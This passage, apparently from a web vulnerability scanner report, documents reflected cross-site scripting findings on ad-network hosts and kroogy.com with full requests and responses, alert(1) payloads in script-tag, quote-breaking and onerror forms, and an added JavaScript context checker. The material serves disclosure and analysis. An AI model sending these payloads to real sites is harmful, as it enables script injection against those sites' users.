As in 5.6, the response is a text/javascript resource and the value lands inside a double-quoted JavaScript string literal (the argument to __ADXPOSE_DRAIN_QUEUE__), where the <script> markup is inert. A quote-breaking canary is the relevant test, and the impact depends on an including page passing an attacker-influenced uid; the reflection alone does not demonstrate script execution.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-6888065668292638%26output%3Dhtml%26h%3D600%26slotname%3D2465090616%26w%3D160%26ea%3D0%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_120_600_a.php%253Fsearch%253D%257B%2524keyword%257D%26dt%3D1303647951817%26bpp%3D4%26shv%3Dr20110414%26jsv%3Dr20110415%26correlator%3D1303647951838%26frm%3D1%26adk%3D2614322350%26ga_vid%3D2144667481.1303647952%26ga_sid%3D1303647952%26ga_hid%3D2004805199%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D3901296887%26fu%3D4%26ifi%3D1%26dtd%3D26&uid=ZC45X9Axu6NOUFfX_28966898ed0<script>alert(1)</script>82d8bb5aab2&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303647980799-33281526900827884&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C8BADFB2649DAACCD3E1635ED3EF64F7; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Sun, 24 Apr 2011 12:30:39 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_28966898ed0<script>alert(1)</script>82d8bb5aab2");

5.9. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1245f'-alert(1)-'7270a6fca4a was submitted in the cnd parameter. This input was echoed unmodified in the application's response. The response body is a document.write('<scr' + 'ipt …') wrapper that writes an inline script into the including page, and the cnd value appears inside the single-quoted string passed to document.write, so a single quote in cnd terminates that literal and whatever follows is parsed as JavaScript by the page that loads this resource.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=UbgehetRD0BSuB6F61EPQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAmx_UNQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303647972%29%3Buf%28%27c%27%2C+47580%2C+1303647972%29%3Buf%28%27r%27%2C+173254%2C+1303647972%29%3Bppv%288991%2C+%272648761091995253405%27%2C+1303647972%2C+1303691172%2C+47580%2C+25553%29%3B&cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..1245f'-alert(1)-'7270a6fca4a&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQW5AAFuF0K5TsMlgwlG6ulJHSvXriXqLC8qA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^gvuV^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM#DUE%oZDSFs[C#jT6#4fpHXSw^4MSkbcW^kJHs5vG[(l?%GK2v+wIbLRbZpJZPWPCtBpj(f-%Uqi+C`pFa#KCPN5<uj90t1PzS3+VX?C

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Kjs:Q'YOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9v`THC)^>; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 24 Apr 2011 12:31:20 GMT
Content-Length: 1533

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAA
...[SNIP]...
D8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..1245f'-alert(1)-'7270a6fca4a/referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4A
...[SNIP]...

5.10. http://kroogy.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4c9e<img%20src%3da%20onerror%3dalert(1)>0d6ca5ff0dc was submitted in the REST URL parameter 1. This input was echoed as f4c9e<img src=a onerror=alert(1)>0d6ca5ff0dc in the application's response, that is, URL-decoded by the server before being written into the page.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The response is an error page that capitalises the first path segment and displays it as a controller name (Favicon.ico…Controller) inside <strong> before a meta refresh to the kroogy.com search page, so the reflection is not specific to favicon.ico: the first segment of any unrouted path is echoed, and 5.11 onwards show the same page reflecting the first and second segments of /index/livesearch.
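Before accepting a scanner's "Certain" verdict, it is worth re-deriving the context the canary landed in and whether that particular canary does anything there; the distinction separates the live findings (5.1, 5.7, this one) from the reflections in 5.6 and 5.8 that need a different payload. The following is an added example, not code from this report or from any of the vendors named. The response fragments are constructed and abbreviated from the bodies shown in 5.1, 5.6, 5.7 and 5.10, plus one constructed negative case; the context walker is a deliberately simple tokenizer (no comments, regex literals or template strings), an assumption standing in for a real JavaScript parser.

```javascript
// Added example (not from the scanner report). Samples are constructed,
// abbreviated from the responses shown in findings 5.1, 5.6, 5.7 and 5.10.
const SCRIPT_TYPES = /^(text\/javascript|application\/(x-)?javascript)/i;

const SAMPLES = {
  doubleclick: { // 5.1: inline script inside an HTML response
    payload: 'f993c"-alert(1)-"20f0488e922', prefix: 'f993c', suffix: '20f0488e922',
    contentType: 'text/html',
    body: '<html><head><title>Click here to find out more!</title></head><body>' +
      '<script>\nvar url = escape("http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls' +
      '&labels=_click.rand.43369f993c"-alert(1)-"20f0488e922&rtbip=63.251.90.149");\n' +
      'var fscUrl = url;\n</script></body></html>',
  },
  adxpose: { // 5.6: script resource, echo inside a double-quoted literal
    payload: 'ad34f<script>alert(1)</script>7e0dd690cc', prefix: 'ad34f', suffix: '7e0dd690cc',
    contentType: 'text/javascript;charset=UTF-8',
    body: 'if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}' +
      '__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_289668ad34f<script>alert(1)</script>7e0dd690cc",' +
      '"ZC45X9Axu6NOUFfX_289668ad34f<script>alert(1)</script>7e0dd690cc");',
  },
  voicefive: { // 5.7: script resource, echo in code position (callback name)
    payload: 'e96ed<script>alert(1)</script>bfcafa00f07', prefix: 'e96ed', suffix: 'bfcafa00f07',
    contentType: 'application/x-javascript',
    body: 'COMSCORE.BMX.Broker.handleInteractione96ed<script>alert(1)</script>bfcafa00f07("");',
  },
  kroogy: { // 5.10: HTML error page, URL-decoded echo between tags
    payload: 'f4c9e<img%20src%3da%20onerror%3dalert(1)>0d6ca5ff0dc', prefix: 'f4c9e', suffix: '0d6ca5ff0dc',
    contentType: 'text/html',
    body: '<html><head><style>.x { padding: 0px; }</style></head><body>' +
      '<strong>Favicon.icof4c9e<img src=a onerror=alert(1)>0d6ca5ff0dcController</strong></body></html>',
  },
  entityEncoded: { // constructed negative case: the host entity-encodes the echo
    payload: 'c0ffe<script>alert(1)</script>deadbeef', prefix: 'c0ffe', suffix: 'deadbeef',
    contentType: 'text/html',
    body: '<p>c0ffe&lt;script&gt;alert(1)&lt;/script&gt;deadbeef</p>',
  },
};

// Locate prefix...suffix in the body and return what was echoed between them.
function findEcho(body, prefix, suffix) {
  const start = body.indexOf(prefix);
  if (start < 0) return null;
  const end = body.indexOf(suffix, start + prefix.length);
  if (end < 0) return null;
  return { index: start, echoed: body.slice(start + prefix.length, end) };
}

// Walk the body up to `index`, tracking <script> elements (HTML responses only)
// and JavaScript string literals, and name the context the echo landed in.
function contextAt(body, index, isScriptResource) {
  let inScript = isScriptResource, quote = null, i = 0;
  while (i < index) {
    if (!inScript) {
      if (body.startsWith('<script', i)) {
        const close = body.indexOf('>', i);
        if (close < 0 || close >= index) return 'html-tag';
        inScript = true; i = close + 1;
      } else { i += 1; }
      continue;
    }
    if (!isScriptResource && quote === null && body.startsWith('</script>', i)) {
      inScript = false; i += 9; continue;
    }
    const c = body[i];
    if (quote !== null) {
      if (c === '\\') { i += 2; } else { if (c === quote) quote = null; i += 1; } // skip escapes
    } else {
      if (c === '"' || c === "'") quote = c;
      i += 1;
    }
  }
  if (!inScript) return 'html-text';
  return quote === '"' ? 'js-string-double' : quote === "'" ? 'js-string-single' : 'js-code';
}

// Does the echoed text change parsing in that context? Markup only matters in
// HTML text; inside a JS string only the matching quote does; in code
// position every token is live.
function payloadIsLive(echoed, context) {
  if (context === 'html-text') return /<[a-z]/i.test(echoed);
  if (context === 'js-string-double') return echoed.includes('"');
  if (context === 'js-string-single') return echoed.includes("'");
  return context === 'js-code';
}

function assess({ payload, prefix, suffix, body, contentType }) {
  const inner = payload.slice(prefix.length, payload.length - suffix.length);
  const hit = findEcho(body, prefix, suffix);
  if (hit === null) return { reflected: 'none', context: null, live: false, echoedAs: null };
  let decoded = inner;
  try { decoded = decodeURIComponent(inner); } catch (e) { /* malformed %: keep raw */ }
  const reflected = hit.echoed === inner ? 'unmodified'
    : hit.echoed === decoded ? 'url-decoded' : 'encoded';
  const context = contextAt(body, hit.index, SCRIPT_TYPES.test(contentType));
  const live = reflected !== 'encoded' && payloadIsLive(hit.echoed, context);
  return { reflected, context, live, echoedAs: hit.echoed };
}

function assessAll() {
  const out = {};
  for (const [name, sample] of Object.entries(SAMPLES)) out[name] = assess(sample);
  return out;
}
```

assessAll() reports doubleclick as unmodified / js-string-double / live, kroogy as url-decoded / html-text / live, voicefive as js-code / live, and adxpose as js-string-double but not live, which is the reason 5.6 and 5.8 need a quote-breaking canary rather than the <script> one the scanner used. The "reflected" field reproduces the scanner's "echoed unmodified" versus "echoed as" wording.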

Request

GET /favicon.icof4c9e<img%20src%3da%20onerror%3dalert(1)>0d6ca5ff0dc HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2134

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Favicon.icof4c9e<img src=a onerror=alert(1)>0d6ca5ff0dcController</strong>
...[SNIP]...

5.11. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=s&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5289d<img%20src%3da%20onerror%3dalert(1)>704a0bea83e was submitted in the REST URL parameter 1. This input was echoed as 5289d<img src=a onerror=alert(1)>704a0bea83e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index5289d<img%20src%3da%20onerror%3dalert(1)>704a0bea83e/livesearch&q=s&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index5289d<img src=a onerror=alert(1)>704a0bea83eController</strong>
...[SNIP]...

5.12. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=s&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84a7e<img%20src%3da%20onerror%3dalert(1)>70c18f09796 was submitted in the REST URL parameter 2. This input was echoed as 84a7e<img src=a onerror=alert(1)>70c18f09796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearch84a7e<img%20src%3da%20onerror%3dalert(1)>70c18f09796&q=s&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearch84a7e<img src=a onerror=alert(1)>70c18f09796</strong>
...[SNIP]...

5.13. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=si&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 83857<img%20src%3da%20onerror%3dalert(1)>5428059cf9b was submitted in the REST URL parameter 1. This input was echoed as 83857<img src=a onerror=alert(1)>5428059cf9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index83857<img%20src%3da%20onerror%3dalert(1)>5428059cf9b/livesearch&q=si&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:27:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index83857<img src=a onerror=alert(1)>5428059cf9bController</strong>
...[SNIP]...

5.14. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=si&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c18b9<img%20src%3da%20onerror%3dalert(1)>e9c49ce397c was submitted in the REST URL parameter 2. This input was echoed as c18b9<img src=a onerror=alert(1)>e9c49ce397c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearchc18b9<img%20src%3da%20onerror%3dalert(1)>e9c49ce397c&q=si&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearchc18b9<img src=a onerror=alert(1)>e9c49ce397c</strong>
...[SNIP]...

5.15. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=sit&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44c9f<img%20src%3da%20onerror%3dalert(1)>230c1568b68 was submitted in the REST URL parameter 1. This input was echoed as 44c9f<img src=a onerror=alert(1)>230c1568b68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index44c9f<img%20src%3da%20onerror%3dalert(1)>230c1568b68/livesearch&q=sit&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index44c9f<img src=a onerror=alert(1)>230c1568b68Controller</strong>
...[SNIP]...

5.16. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=sit&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a288e<img%20src%3da%20onerror%3dalert(1)>085eb934534 was submitted in the REST URL parameter 2. This input was echoed as a288e<img src=a onerror=alert(1)>085eb934534 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearcha288e<img%20src%3da%20onerror%3dalert(1)>085eb934534&q=sit&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
